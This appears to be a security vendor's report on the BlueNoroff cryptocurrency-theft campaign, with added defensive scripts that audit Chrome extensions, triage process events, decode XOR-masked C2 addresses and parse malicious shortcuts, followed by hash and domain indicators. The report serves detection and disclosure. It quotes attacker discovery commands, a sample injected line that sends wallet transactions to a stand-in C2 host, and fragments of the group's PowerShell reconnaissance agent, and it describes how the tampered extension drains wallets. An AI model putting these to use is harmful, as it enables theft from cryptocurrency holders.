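    ("WS01", r'cmd.exe /c "net localgroup administrators >%temp%\TMP9518.tmp 2>&1"'),
    ("WS01", r'xcopy "%user%\Desktop\work\MM" %public%\MM /S /E /Q /Y'),
    ("WS02", r'cmd.exe /c dir C:\Users'),
    ("WS02", r'whoami /groups'),
]

if __name__ == "__main__":
    for host, verdict in triage_hosts(SAMPLE_EVENTS).items():
        print(host, verdict)
```

In a real deployment the events come from Sysmon Event ID 1 or EDR process-creation records and the redirect regex is the high-signal part; the discovery list only serves to suppress single benign uses of the same commands.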

Stealing cryptocurrency

In some cases where the attackers realized they had found a prominent target, they carefully monitored the user for weeks or months. They collected keystrokes and monitored the user’s daily operations, while planning a strategy for financial theft.

If the attackers realize that the target uses a popular browser extension to manage crypto wallets (such as the Metamask extension), they change the extension source from the Web Store to local storage and replace the core extension component (background.js) with a tampered version. At first, they are interested in monitoring transactions. The screenshot below shows a comparison of two files: a legitimate Metamask background.js file and its compromised variant with the injected lines of code highlighted in yellow. You can see that in this case they set up monitoring of transactions between a particular sender and recipient address. We believe they have a vast monitoring infrastructure that triggers a notification upon discovering large transfers.

The details of the transaction are automatically submitted via HTTP to a C2 server:

In another case, they realized that the user owned a substantial amount of cryptocurrency, but used a hardware wallet. The same method was used to steal funds from that user: they intercepted the transaction process and injected their own logic.

All this sounds easy, but in fact requires a thorough analysis of the Metamask Chrome extension, which is over 6MB of JavaScript code (about 170,000 lines of code) and implementation of a code injection that rewrites transaction details on demand when the extension is used.

This way, when the compromised user transfers funds to another account, the transaction is signed on the hardware wallet. However, because the action was initiated by the user at that very moment, the user doesn’t suspect anything fishy is going on and confirms the transaction on the secure device without paying attention to the transaction details. The user isn’t too worried when the amount they entered is low and a mistake would feel insignificant. However, the attackers modify not only the recipient address, but also push the amount of currency to the limit, essentially draining the account in one move.

The injection is very hard to find manually unless you are very familiar with the Metamask codebase. However, a modification of the Chrome extension leaves a trace. The browser has to be switched to Developer mode and the Metamask extension is installed from a local directory instead of the online store. If the plugin comes from the store, Chrome enforces digital signature validation for the code and guarantees code integrity. So, if you are in doubt, immediately check your Metamask extension and Chrome settings.
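The two checks recommended above (is the extension loaded from a local directory rather than the Web Store, and what was added to background.js) can be scripted. The Python below is an added example for this edit, not MetaMask's or Kaspersky's code: it reads the extension settings from Chrome's Secure Preferences JSON, flags unpacked installs using Chromium's ManifestLocation codes (1 = Web Store install, 4 = unpacked; these codes and the MetaMask extension ID are not from the page and are taken from the Chromium source and the Web Store), and diffs a suspect background.js against a reference copy to list injected lines. The preferences dict and the two scripts are constructed samples.

```python
import difflib
import json

# Chromium ManifestLocation codes (assumption from the Chromium source, not from the
# page): 1 = INTERNAL (installed from the Web Store), 4 = UNPACKED (loaded from a
# local directory via Developer mode).
LOCATION_INTERNAL = 1
LOCATION_UNPACKED = 4
# MetaMask's Chrome Web Store extension ID (not taken from the page).
METAMASK_ID = "nkbihfbeogaeaoehlefnkodbefgpgknn"


def load_prefs(path: str) -> dict:
    """Load Chrome's 'Secure Preferences' (or 'Preferences') JSON from a profile."""
    with open(path, encoding="utf-8") as f:
        return json.load(f)


def audit_extension_settings(prefs: dict, watch_ids=(METAMASK_ID,)):
    """Flag extensions loaded unpacked, and watched extensions not marked as
    coming from the Web Store. Each finding keeps the on-disk path for follow-up."""
    findings = []
    settings = prefs.get("extensions", {}).get("settings", {})
    for ext_id, ext in settings.items():
        location = ext.get("location")
        from_store = bool(ext.get("from_webstore", False))
        if location == LOCATION_UNPACKED or (ext_id in watch_ids and not from_store):
            findings.append({"id": ext_id, "location": location,
                             "from_webstore": from_store, "path": ext.get("path")})
    return findings


def injected_lines(reference_js: str, suspect_js: str):
    """Lines present in the suspect script but absent from the reference copy,
    i.e. the highlighted lines in the page's background.js comparison."""
    diff = difflib.unified_diff(reference_js.splitlines(), suspect_js.splitlines(),
                                lineterm="", n=0)
    return [line[1:] for line in diff
            if line.startswith("+") and not line.startswith("+++")]


# Constructed sample data (not a real profile, not MetaMask's code).
SAMPLE_PREFS = {"extensions": {"settings": {
    METAMASK_ID: {"location": LOCATION_UNPACKED, "from_webstore": False,
                  "path": "C:\\Users\\victim\\AppData\\Local\\mm-local"},
    "a" * 32: {"location": LOCATION_INTERNAL, "from_webstore": True,
               "path": "a" * 32 + "\\1.0_0"},
}}}
REFERENCE_JS = "function sendTx(tx) {\n  return signAndSend(tx);\n}\n"
SUSPECT_JS = ("function sendTx(tx) {\n"
              "  fetch('https://c2.invalid/tx', {method: 'POST', body: JSON.stringify(tx)});\n"
              "  return signAndSend(tx);\n}\n")

if __name__ == "__main__":
    for finding in audit_extension_settings(SAMPLE_PREFS):
        print("suspicious extension:", finding)
    for line in injected_lines(REFERENCE_JS, SUSPECT_JS):
        print("injected:", line)
```

On a real machine the input is the profile's Secure Preferences file (for example under the user's Chrome "User Data\Default" directory), and the reference background.js comes from a fresh Web Store install of the same MetaMask version; an unpacked install of a wallet extension on a machine whose user is not an extension developer is exactly the trace the post says to look for.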

Developer mode enabled in Google Chrome

If you use Developer mode, make sure your important extensions come from the Web Store

Unless you are a Metamask developer yourself, this may indicate a Trojanized extension
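A practical way to run the check described above, as an added example that is not code from Kaspersky or from the MetaMask project: the script below reads the JSON preferences file Chrome keeps in the profile directory (Preferences, or Secure Preferences on Windows and macOS), reports whether Developer mode is on, and flags extensions that were loaded unpacked from a local directory, are recorded as not coming from the Web Store, or carry the MetaMask name under an id other than the store listing's. The location codes, the MetaMask store id and the sample preferences are assumptions and constructed data, labelled as such in the code.

```python
"""Audit a Chrome profile's extension preferences for a sideloaded
(unpacked) wallet extension and an enabled Developer mode.

Added example, not Kaspersky's or MetaMask's code. Reads the JSON that
Chrome keeps under the profile directory ("Preferences", or
"Secure Preferences" on Windows/macOS); the sample below is constructed.
"""
import json

# Values of Chrome's Manifest::Location enum as serialized under
# extensions.settings.<id>.location (1 = installed from CRX/Web Store,
# 4 = "Load unpacked", which is only possible with Developer mode on).
LOCATION_INTERNAL = 1
LOCATION_UNPACKED = 4

# MetaMask's Chrome Web Store id (assumption: verify against the store listing)
METAMASK_STORE_ID = "nkbihfbeogaeaoehlefnkodbefgpgknn"


def load_prefs(path: str) -> dict:
    """Load a Chrome Preferences / Secure Preferences file."""
    with open(path, "r", encoding="utf-8") as f:
        return json.load(f)


def looks_absolute(path: str) -> bool:
    """Store-installed extensions are recorded as '<id>/<version>' relative to
    the profile; unpacked ones carry an absolute path on any platform."""
    return path.startswith(("/", "\\")) or ":" in path[:3]


def audit_extensions(prefs: dict) -> dict:
    """Return {'developer_mode': bool, 'suspicious': [finding, ...]}."""
    ext = prefs.get("extensions", {})
    findings = {
        "developer_mode": bool(ext.get("ui", {}).get("developer_mode", False)),
        "suspicious": [],
    }
    for ext_id, settings in ext.get("settings", {}).items():
        name = settings.get("manifest", {}).get("name", "")
        path = settings.get("path", "")
        issues = []
        if settings.get("location") == LOCATION_UNPACKED:
            issues.append("loaded unpacked from a local directory")
        if settings.get("from_webstore") is False:
            issues.append("not installed from the Web Store")
        if path and looks_absolute(path):
            issues.append("absolute install path: " + path)
        if "metamask" in name.lower() and ext_id != METAMASK_STORE_ID:
            issues.append("MetaMask-named extension with a non-store id")
        if issues:
            findings["suspicious"].append({"id": ext_id, "name": name, "issues": issues})
    return findings


# Constructed sample: a genuine store install plus a sideloaded copy.
SAMPLE_PREFS = {
    "extensions": {
        "ui": {"developer_mode": True},
        "settings": {
            METAMASK_STORE_ID: {
                "location": LOCATION_INTERNAL,
                "from_webstore": True,
                "path": METAMASK_STORE_ID + "/10.0.0_0",
                "manifest": {"name": "MetaMask", "version": "10.0.0"},
            },
            "abcdefghijklmnopabcdefghijklmnop": {  # placeholder id, constructed
                "location": LOCATION_UNPACKED,
                "from_webstore": False,
                "path": "C:\\Users\\victim\\AppData\\Local\\ext\\metamask",
                "manifest": {"name": "MetaMask", "version": "10.0.0"},
            },
        },
    }
}

if __name__ == "__main__":
    import sys
    prefs = load_prefs(sys.argv[1]) if len(sys.argv) > 1 else SAMPLE_PREFS
    result = audit_extensions(prefs)
    print("Developer mode:", result["developer_mode"])
    for f in result["suspicious"]:
        print(f["id"], f["name"], "->", "; ".join(f["issues"]))
```

Run it against a copied profile file (never the live one while Chrome is running, to avoid partial writes). A store install that has been tampered with in place would not be caught by these flags alone; for that, compare the extension directory's background.js against a pristine copy of the same version.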

SnatchCrypto’s victims

The targets of the SnatchCrypto campaign are not limited to specific countries or continents. The campaign is aimed at various companies that by the nature of their work deal with cryptocurrencies, smart contracts, DeFi, blockchains and the FinTech industry.

According to our telemetry, we discovered victims from Russia, Poland, Slovenia, Ukraine, the Czech Republic, China, India, the US, Hong Kong, Singapore, the UAE and Vietnam. However, based on the shortened URL click history and decoy documents, we assess there were more victims of this financially motivated attack campaign.

BlueNoroff victims

In addition to the above-mentioned countries, we observed uploads of weaponized documents and compromised Metamask extensions from Indonesia, the UK, Sweden, Germany, Bulgaria, Estonia, Russia, Malta and Portugal.

SnatchCrypto’s attribution

We assess with high confidence that the financially motivated BlueNoroff group is behind this campaign. As a result of understanding the SnatchCrypto campaign’s full chain of infection, we can identify several overlaps with the BlueNoroff group’s previous activities.

VBA macro authorship

Analysis of the VBA macro from the remote template used during the initial infection revealed that the code matched the style and technique previously used by Clément Labro, an offensive security researcher from the company SCRT based out of Morges, Vaud, Switzerland. The original process-injection code from the VBA macro has not been found publicly, so either Clément developed it privately and it later became available to BlueNoroff, or someone adapted his other VBA code, such as the VBA-RunPE project.

PowerShell scripts overlap

One tool this group has relied on heavily is a PowerShell script. Through the initial infection they deployed PowerShell agents on several victims, which send basic system information and execute commands from the control server. They have used this PowerShell script continuously, adding small updates over time.

PowerShell script used in previous BlueNoroff campaign:

function GetBasicInformation
{
$HostName = [System.Environment]::MachineName;
$UserName = [System.Environment]::UserName;
$DomainName = [System.Environment]::UserDomainName;
$CurrentDir = [System.Environment]::CurrentDirectory;
$BinPath = [System.Environment]::GetCommandLineArgs()[0];
$OSVersion = [System.Environment]::OSVersion.VersionString;
$Is64BitOS = [System.Environment]::Is64BitOperatingSystem;
$Is64BitProcess = [System.Environment]::Is64BitProcess;
$PSVersion = 'PS ' + [System.Environment]::Version;
$BasicInformation = $HostName + '|' + $UserName + '|' + $DomainName + '|' + $CurrentDir + '|' + $BinPath + '|' + $OSVersion + '|' + $Is64BitOS + '|' + $Is64BitProcess + '|' + $PSVersion;
return $BasicInformation;
}
function ProcessCommand
{

PowerShell script used in 2021 campaign:

function GetBI
{
$HostName = [System.Environment]::MachineName;
$UserName = [System.Environment]::UserName;
$DomainName = [System.Environment]::UserDomainName;
$CurrentDir = [System.Environment]::CurrentDirectory;
$BinPath = [System.Environment]::GetCommandLineArgs()[0];
$OSVersion = [System.Environment]::OSVersion.VersionString;
$Is64BitOS = [System.Environment]::Is64BitOperatingSystem;
$Is64BitProcess = [System.Environment]::Is64BitProcess;
$PSVersion = [System.Environment]::Version;
$BasicInformation = $HostName + '|' + $UserName + '|' + $DomainName + '|' + $CurrentDir + '|' + $BinPath + '|' + $OSVersion + '|' + $Is64BitOS + '|' + $Is64BitProcess + '|' + $PSVersion;
return $BasicInformation;
}
function ProcessCommand
{

Backdoor overlap

Through the complicated infection chain, a Windows executable backdoor is eventually installed on the victim machine. We were able to identify this backdoor on only a few hosts. It has many code similarities with previously known BlueNoroff malware: using the Kaspersky Threat Attribution Engine (KTAE), we see that the malware binaries used in this campaign have considerable code similarities with known tools of the BlueNoroff group.

Code similarity of backdoor

In addition, we can identify uncommon techniques typically found in the BlueNoroff group’s malware. The group’s malware acquires its real C2 address by XORing the resolved IP address with a hardcoded DWORD value. We saw the same technique in our previous BlueNoroff report, and the malware used in the SnatchCrypto campaign acquires its real C2 addresses in the same way.

Similar C2 address acquiring scheme
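To make the C2 scheme concrete, here is an added example (constructed key and addresses, not indicators from this report) showing the analyst-side arithmetic: apply a DWORD pulled from a sample to the decoy answers seen in DNS logs to obtain the real C2 for blocking, and recover the DWORD from one known decoy/real pair. The byte order in which the DWORD is applied is an assumption and is exposed as a parameter.

```python
"""Recover the real C2 endpoint behind an XOR-obfuscated DNS answer.

Added example; constructed values, not indicators from the report. The
malware resolves a hostname and XORs the returned IPv4 address with a
hardcoded DWORD; an analyst who has pulled that DWORD out of a sample can
apply the same operation to resolver logs to learn the real C2 and, with
a known pair of addresses, recover the key itself.
"""
import ipaddress


def _key_bytes(key: int, little_endian: bool) -> bytes:
    return (key & 0xFFFFFFFF).to_bytes(4, "little" if little_endian else "big")


def xor_ip(ip: str, key: int, little_endian: bool = True) -> str:
    """XOR an IPv4 address with a 32-bit key.

    Byte order is an assumption: little-endian (x86 register layout) by
    default, so key 0x01020304 is applied as bytes 04 03 02 01 to the
    address octets in their usual order.
    """
    addr = ipaddress.IPv4Address(ip).packed
    kb = _key_bytes(key, little_endian)
    return str(ipaddress.IPv4Address(bytes(a ^ k for a, k in zip(addr, kb))))


def recover_key(observed_ip: str, real_ip: str, little_endian: bool = True) -> int:
    """Given a decoy DNS answer and the real C2 it maps to, recover the DWORD."""
    a = ipaddress.IPv4Address(observed_ip).packed
    b = ipaddress.IPv4Address(real_ip).packed
    diff = bytes(x ^ y for x, y in zip(a, b))
    return int.from_bytes(diff, "little" if little_endian else "big")


def decode_resolver_log(lines, key: int, little_endian: bool = True):
    """Map 'host -> answer' lines from a DNS log to (host, decoy, real C2)."""
    out = []
    for line in lines:
        host, _, answer = line.partition(" -> ")
        answer = answer.strip()
        try:
            out.append((host.strip(), answer, xor_ip(answer, key, little_endian)))
        except ipaddress.AddressValueError:
            continue  # skip malformed answers rather than abort triage
    return out


# Constructed sample: a key and two decoy answers (documentation ranges,
# not real indicators).
SAMPLE_KEY = 0x5A5A5A5A
SAMPLE_LOG = [
    "decoy.example -> 203.0.113.10",
    "decoy2.example -> 198.51.100.7",
    "garbage.example -> not-an-ip",
]

if __name__ == "__main__":
    for host, decoy, real in decode_resolver_log(SAMPLE_LOG, SAMPLE_KEY):
        print(f"{host}: {decoy} -> {real}")
```

Because XOR is its own inverse, the same function turns a real C2 back into the decoy the sample will expect to see, which is useful when writing a detection that matches on the DNS answer rather than on the connection.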

In addition, based on the metadata of the Windows shortcut files, we found that the actor behind this campaign is familiar with the Korean operating system environment.

[String Data]
Working Directory (UNICODE):  %currentdir%
Arguments (UNICODE):          hxxps://bit[.]ly/2Q9tfCz
Icon location (UNICODE):      C:\Windows\notepad.exe
[Console Code Page]
Code page: 949 (EUC-KR)
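The shortcut metadata above can be pulled out with a small MS-SHLLINK walker. The one below is an added example written for this section, not Kaspersky tooling; it builds a sample .lnk in memory from the values listed above (the argument string is kept in its defanged form) rather than shipping a real file. It reads the StringData fields in their fixed order, scans the ExtraData blocks for the ConsoleFEDataBlock that carries the console code page, and then applies a few triage heuristics drawn from the findings in this report.

```python
"""Parse the StringData and the ConsoleFEDataBlock of a Windows shortcut.

Added example written for this section (not Kaspersky tooling): a minimal
MS-SHLLINK walker that pulls out the working directory, arguments, icon
location and the console code page used above for attribution. The sample
shortcut is constructed in build_sample_lnk(); real LNK files carry more
fields, which are skipped here.
"""
import struct

LNK_CLSID = bytes.fromhex("0114020000000000c000000000000046")
HAS_LINK_TARGET_ID_LIST, HAS_LINK_INFO = 0x01, 0x02
HAS_NAME, HAS_RELATIVE_PATH, HAS_WORKING_DIR = 0x04, 0x08, 0x10
HAS_ARGUMENTS, HAS_ICON_LOCATION, IS_UNICODE = 0x20, 0x40, 0x80
CONSOLE_FE_DATA_BLOCK = 0xA0000004  # ExtraData block holding the code page
STRING_FIELDS = (
    (HAS_NAME, "name"), (HAS_RELATIVE_PATH, "relative_path"),
    (HAS_WORKING_DIR, "working_dir"), (HAS_ARGUMENTS, "arguments"),
    (HAS_ICON_LOCATION, "icon_location"),
)


def _read_string(data: bytes, off: int, unicode: bool):
    """StringData item: u16 character count followed by the characters."""
    (count,) = struct.unpack_from("<H", data, off)
    off += 2
    if unicode:
        return data[off:off + 2 * count].decode("utf-16-le"), off + 2 * count
    return data[off:off + count].decode("latin-1"), off + count


def parse_lnk(data: bytes) -> dict:
    """Return the StringData fields present plus 'code_page' (or None)."""
    if (len(data) < 0x4C or struct.unpack_from("<I", data, 0)[0] != 0x4C
            or data[4:20] != LNK_CLSID):
        raise ValueError("not a shell link file")
    (flags,) = struct.unpack_from("<I", data, 0x14)
    off = 0x4C
    if flags & HAS_LINK_TARGET_ID_LIST:          # skip IDList (u16 size)
        off += 2 + struct.unpack_from("<H", data, off)[0]
    if flags & HAS_LINK_INFO:                    # skip LinkInfo (u32 size)
        off += struct.unpack_from("<I", data, off)[0]
    info = {"code_page": None}
    for bit, key in STRING_FIELDS:               # StringData, fixed order
        if flags & bit:
            info[key], off = _read_string(data, off, bool(flags & IS_UNICODE))
    while off + 8 <= len(data):                  # ExtraData until terminal block
        size, sig = struct.unpack_from("<II", data, off)
        if size < 4:
            break
        if sig == CONSOLE_FE_DATA_BLOCK and size >= 12:
            info["code_page"] = struct.unpack_from("<I", data, off + 8)[0]
        off += size
    return info


def triage(info: dict) -> list:
    """Heuristic flags in the spirit of the report's findings."""
    flags = []
    if "://" in info.get("arguments", ""):
        flags.append("arguments carry a URL")
    if info.get("icon_location", "").lower().endswith("notepad.exe"):
        flags.append("icon borrowed from notepad.exe (document lure)")
    if info.get("code_page") == 949:
        flags.append("console code page 949 (EUC-KR)")
    return flags


def build_sample_lnk() -> bytes:
    """Constructed shortcut carrying the fields shown above (defanged URL)."""
    flags = HAS_WORKING_DIR | HAS_ARGUMENTS | HAS_ICON_LOCATION | IS_UNICODE
    header = struct.pack("<I", 0x4C) + LNK_CLSID + struct.pack("<I", flags)
    header += bytes(0x4C - len(header))          # remaining header fields zeroed

    def s(text: str) -> bytes:
        return struct.pack("<H", len(text)) + text.encode("utf-16-le")

    strings = s("%currentdir%") + s("hxxps://bit[.]ly/2Q9tfCz") + s("C:\\Windows\\notepad.exe")
    extra = struct.pack("<III", 12, CONSOLE_FE_DATA_BLOCK, 949) + struct.pack("<I", 0)
    return header + strings + extra


if __name__ == "__main__":
    import sys
    data = open(sys.argv[1], "rb").read() if len(sys.argv) > 1 else build_sample_lnk()
    parsed = parse_lnk(data)
    print(parsed)
    print(triage(parsed))
```

A code page on its own is weak evidence, as the report itself treats it: it is one of several overlaps, and the other heuristics here (a URL in the arguments, a borrowed document icon) are what make a shortcut worth a closer look in the first place.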

BlueNoroff’s indicators of compromise

Malicious shortcut files
033609f8672303feb70a4c0f80243349
2100e6e585f0a2a43f47093b6fabde74
4a3de148b5df41a56bde78a5dcf41975
5af886030204952ae243eedd25dd43c4    Password.txt.lnk
5f761f9aa3c1a76b17f584b9547a01a7    Password.txt.lnk
7a4a0b0f82e63941713ffd97c127dac8    Password.txt.lnk
813203e18dc1cc8c70d36ed691ca0df3
961e6ec465d7354a8316393b30f9c6e9    Gdpr Password.txt.lnk
9ea244f0a0a955e43293e640bb4ee646
a3c61de3938e7599c0199d2778f7d417    Password.txt.lnk
a5d4bfc3eab1a28ffbcba67625d8292e
a94529063c3acdbfa770657e9126b56d
ab095cb9bc84f37a0a655fbc00e5f50e
b52d30d1db40d5d3c375c4a7c8a115c1
dd2569684ca52ed176f1619ecbfa7aaa
dff21849756eca89ebfaa33ed3185d95
e18dd8e61c736cfc6fff86b07a352c12
e546b851ac4fa5a111d10f40260b1466
e6e64c511f935d31a8859e9f3147fe24    Password.txt.lnk
ea7ed84f7936d4cbafa7cec51fe39cf7
f414f6590636037a6ec92a4d951bdf55
4e207d6e930db4293a6d720cf47858fc
5e44deca6209e64f4093beae92db0c93    Password.txt.lnk
84c427e002fd162d596f3f43ce86fd6a    Password.txt.lnk
c16977fefbdc825a5c6760d2b4ea3914
e5d12ef32f9bd3235d0ac45013040589
09bca3ddbc55f22577d2f3a7fda22d1c    Password.txt.lnk
0eb71e4d2978547bd96221548548e9f0    Password.txt.lnk
da599b0cde613b5512c13f299fec739e    Password.txt.lnk
0c9170a2584ceeddb89e4c0f0a2353ed    Password.txt.lnk
5053103dd5d075c1dc54edf1f8568098    Password.txt.lnk
536bae311c99a4d46f503c68595d4431    Password.txt.lnk
3078265f207fed66470436da07343732    Password.txt.lnk
15f1ae1fed1b2ea71fdb9661823663c6    Password.txt.lnk
56fe283ca3e1c1667191cc7764c260b6    Password.txt.lnk
850751de7b8e158d86469d22ad1c3101    Password.txt.lnk
1a8282f73f393656996107b6ec038dd5    Password.txt.lnk
2ea2ceab1588810961d2fc545e2f957e    Password.txt.lnk
561f70411449b327e3f19d81bb2cea08    Password.txt.lnk
3812cdc4225182326b1425c9f3c2d50b    Password.txt.lnk
4274e6dbc2b7aee4ef080d19fff47ce7    Password.txt.lnk
427bdfe4425e6c8e3ea41d89a2f55870    Password.txt.lnk
7a83be17f4628459e120a64fcab70bac    Password.txt.lnk
5d662269739f1b81072e4c7e48972420    Password.txt.lnk
244a23172af8720882ae0141292f5c47    Password.txt.lnk
a8e2c94abb4c1e77068a5e2d8943296c    Password.txt.lnk
89c26cefa057cf21054e64b5560bf583    Xbox.lnk
805949896d8609412732ee7bfb44900a    Password.txt.lnk
a2be99a5aa26155e6e42a17fbe4fd54d    Security Bugs in rigs.pdf.lnk
28917b4187b3b181e750bf024c6adf70    readme.txt.lnk
9f8e51f4adc007bb0364dfafb19a8c11    UserAssist.lnk
790a21734604b374cf260d20770bfc96    SALT Lending Opportunities.pdf.lnk
db315d7b0d9e8c9ca0aa6892202d498b    Password.txt.lnk
02904e802b5dc2f85eec83e3c1948374    Security Bugs in Operation.pdf.lnk
baebc60beaced775551ec23a691c3da6
302314d503ae88058cb4c33a6ac6b79b    Password.txt.lnk
aeac6f569fb9a7d3f32517aa16e430d6    Password.txt.lnk
926DEEAF253636521C26442938013204
8064e00b931c1cab6ba329d665ea599c    MSEdge.lnk
bcb4a8f190f2124be57496649078e0ae
781a20f27b72c1c901164ce1d025f641    MSAssist.lnk
483e3e0b1dceb4a5a13de65d3556c3fe    MSAssist.lnk

Malicious documents
00a63a302dcaffc9f28826e9dba30e03    Abies VC Presentation.docx
ee9dda6bbbb1138263873dbef36a4d42    Abies VC Presentation.docx
0f1c81c2023eae0fc092ce9f58213bcf    Abies VC Presentation.docx
491e0d776f01f102d36155a46f1a8e3c    Ant Capital Presentation (Azure Protected).docx
c33ce08ebcc6e508bb3a17e0fa7b08f8    Global Brain Pitch Deck.docx
b1911ef720b17aeed69ec41c8e94cc1e
340fb219872ce3c0d3acf924f4f9e598    Venture Labo Investment Pitch Deck.docx
380e9e78dc5bc91fb6cdd8b4a875f20a
eb18ac97dba79ea48c185fb2826467fe
2a9ff6d80cdd4aeed1c48a1ccdc525dd    Abies VC Presentation.docx
ecf75bec770edcd89a3c16d3c4edde1a    Abies VC Presentation (1).docx
6c4943f4c28a07ee8cae41dad16d72b3    Abies VC Presentation.docx
f76e2e6bfbee77ae36049880d7c227f7    Abies VC Presentation.docx
7aec3d1b24ed0946ab740924be5834fa    Abies VC Presentation.docx
47e325e3467bfa80055b7c0eebb11212    Abies VC Presentation.docx
1e0d96c551ca31a4055491edc17ce2dd    Abies VC Presentation.docx
bcf97660ce2b09cbffb454aa5436c9a0    Digital Asset Investment Stategy 2020 (ISO 27001).docx
13ff15ac54a297796e558bb96feaacfd    Abies VC Presentation(ISO 27001).docx
cace67b3ea1ce95298933e38311f6d0b    Adviser-Non-Disclosure-Agreement-NDA(ISO 27001).docx
645adf057b55ef731e624ab435a41757    OKEx and DeepMind Intro Deck(ISO 27001_Protected).docx
bde4747408ce3cfdfe8238a133ebcac9    Circle Business Introduction(ISO 27001).docx
421b1e1ab9951d5b8eeda5b041cb0657    Berkshire Hathaway HomeServices Custody – Mutual NDA.docx
d2f08e227cd528ad8b26e9bbe285ae3c    Union Square Ventures Partnership – Mutual NDA Form.docx
04deb35316ebe1789da042c8876c0622    Chiliz Partnership – Mutual NDA Form.docx
af4eefa8cddc1e412fe91ad33199bd71    FasterCapital Mutual NDA Form.docx
34239a3607d8b5b8ddd6797855f2e827    FasterCapital Introduction 2020 Oct.docx
389172d2794d789727b9f7d01ec27f75    Lundbergs NDA Mutual Form.docx
f40e7998a84495648b0338bc016b9417    Union Square Ventures Partnership – Mutual NDA Form.docx
c8c2a9c50ff848342b0885292d5a8cd4    VIRUS.docx
adf9dc317272dc3724895cb07631c361    Non-Disclosure-Agreement-NDA(ISO 27001).docx
158d84c90a79edb97ec5b840d86217c7    Venture Labo Investment Pitch Deck.docx
e26725f34ebcc7fa9976dd07bfbbfba3    Global Brain Pitch Deck.docx
a435acb5bac92b855d1799a685507522
9969b67ef643bed20a38346dcd69bec4
a6446bfea82b69169b4026222ca253b2
bdf1643c3a10a25d3aba2c4c608ec5d5
b4b695c8e6fea95db5843a43644f88b0
d8561c74ad9624d7c35c0fb15d3ca8fe
f9195b14ed20b30b7c239d50e6418151
3dd638551b03a36d13428696dcada5d8
f26eaa212c503aaba6e5015cb8ef44b5     Venture Labo Investment Pitch Deck.docx
793de76de6d4015ebdd5e552ac5b2f90    Pantera Capital Investment Agreement(Protected).docx
709ec9fbbc3c37ccd39758527c332b84    Pantera Capital Investment Agreement(Protected).docx
89099235aad37a29b7acedc96fda0037    Venture Labo Investment Pitch Deck.docx
358791e1abd64f490c865643a3fbb93d    Z Venture Capital Presentation(Protected).docx
cea54a904434c66f217fbadc571e1507    Z Venture Capital Presentation(Protected).docx
9be0075b9344590b3cabf61c194db180    Rapid Change of Stablecoin (Protected).docx
98e30453bbf1c9c9f48368f9bbe69edd    Z Venture Capital Presentation(Protected).docx
9ad7b21603ecce5ee744ba8aa387fb6c    Pantera Capital Investment Agreement(Protected).docx.123.docx.123

Injected remote template
3dd638551b03a36d13428696dcada5d8
2da244dc9bbdbf2013b7fbc2a74073a2
f3157dc297cb802c8ae2f07702903bfa

Visual Basic Script
ce09cdb7979fb9099f46dd33036b9001    xivwtjab.vbs
f7f4aa55a2e4f38a6a3ea5a108baedf5    vwnozphn.vbs

PowerShell
ae52b28b360428829c4fcdc14e839f19    usoclient.ps1

PowerShell agent (VBS-wrapped)
73572519159b0c27a18dbbaf25ef1cc0  guide.vbs
8ae6aa90b5f648b3911430f14c92440b  %APPDATA%\Microsoft\Windows\Start Menu\Programs\Startup\check.vbs
ae12a668dd9f254c42fcd803c7645ed1  1.vbs
589f1bb4da89cfd4a2f7f3489aa426a9  %APPDATA%\microsoft\windows\start menu\programs\startup\guide.vbs

Backdoor
1d0fc2f1a6eb2b2bfa166a613ca871f0
db91826cb9f2ad6edfed8d6bab5bef1f    users.dll, wmc.dll
9c592a22acdfb750c440fda31da4996c

Keylogger
f29be5c7e602e529339fda35ff91bd39

Screencapture malware
f194e074e7d73c544eebb70e2e2785a1

Injector
ec2b51dc1dc99165a0eb46b73c317e25    cssvc.dll
d8e51f1b9f78785ed7449145b705b2e4    cfssvc.dll
dd2d50d2f088ba65a3751e555e0dea71    bfcsvc.dll
f5317f1c0a10a80931378d68be9a4baa    lssc.dll
8727a967bbb5ebd99789f7414d147c31    sst.dll
cab281b38a57524902afcb1c9c8aa5ba    bnt.dll
6a2cbaea7db300925d25d9decf461d95    lmsvc.dll
33a60ea8859307d3fd1a1fe884e37d2d
1993ebb00cb670c6e2ca9b5f6c6375c4    sessc.dll
1fb48113d015466a272e4b70c3109e06    wssc.dll
33ae39569f0051d8dc153d7b4e814a67
525345989e10b64cd4d0e144eb48171f
724d11c2cae561225e7ed31d7517dd40    lsasvc.dll
56df737f3028203db8d51ed1263160ad    ocss.dll
a160b36426ce77bccdd32d117eeb879b    csscv.dll
8fa484d35e60b93a4128dc5de45ec0df    wmmc.dll
5cc93ccc91b2849df55d89b360fbae58
630ba28be4f55ea67225a3760f9e8c1f

Persistence Backdoor #1
2934a7a0dfaf2ebc81b1f089277129c4  Default.rdp
6c97c64052dfdc457b001f84b8657435  Default.rdp
bdc354506d6c018b52cb92a9d91f5f7c  Default.rdp
737478dbd1f66c9edb2d6c149432be26  Default.rdp
5912e271b0da85ae3327d66deabf03ed  Default.rdp
d209c3da192c49cecb5a7b3d0f7154ac  Default.rdp
8d8f3a0d186b275e51589a694e09e884  Default.rdp
7ccf3ddbdb175fcfece9c4423acf07b6
0a9b8ca2988208b876b74641c07f631e  Default.rdp

Persistence Backdoor #2
9b30baa7873d86f985657c3e324ac431  vsat.dll
ae79ea7dfa81e95015bef839c2327108  ssdp.dll
ca9b98f17b9e24ca3f802c04eb508103
849dd9e09cc2434ee7dbdbf9e1c408b2
804523ecb9f7809fc2377d03b47dba22
2b7e434e52ff7480ae06ba901f8efbfd
7129020312b85d5b1e760fc57b567d95
ea9d8b81c9f85fd142639997187b447e
e80f9d2fa735d7ab3bd9e954c4fcb6d0
e2ddf13340ba79b2635618e5675eea23
00a145e8f67a92b01ce4d85a0ed6bd77
73aed6bcf90f936f3fbcb389a133d7c8
ff28ec14ec926b9892c61b9bf154a910
97e5c0fe8089da97665a22975e2c86de
f60d7f620dc925c4e786bcf46856f4c8
4fbff7f0f62b26963b56c0fc23486891
4bb579d59830579be9ead9f74a55001e
aafc80ff2afc71b0d5abd6c8d2809e65
9850b24f8d70ad957f328961170e2d40
58495a2083065b36040eea288a9d5e17
f1cfd14b030e6b5d75e777ace530dad9
1fb25f72e4eb26b0df154de28dbff74c
1b1acc7f27717905e7094f338f81db9f
3776d4a24213972b54b9ed3360ac7883
c93f3bb4f7b19f5eb6f736f2659c4dae
9084620e0219c035d60d395be1bf4cae
2e38f37a23d9f00a02098dd302fc14e2

Domains
abiesvc[.]com
abiesvc[.]info
abiesvc.jp[.]net
atom.publicvm[.]com
att.gdrvupload[.]xyz
authenticate.azure-drive[.]com
azureprotect[.]xyz
backup.163qiye[.]top
beenos[.]biz
bhomes[.]cc
bitcoinnews.mefound[.]com
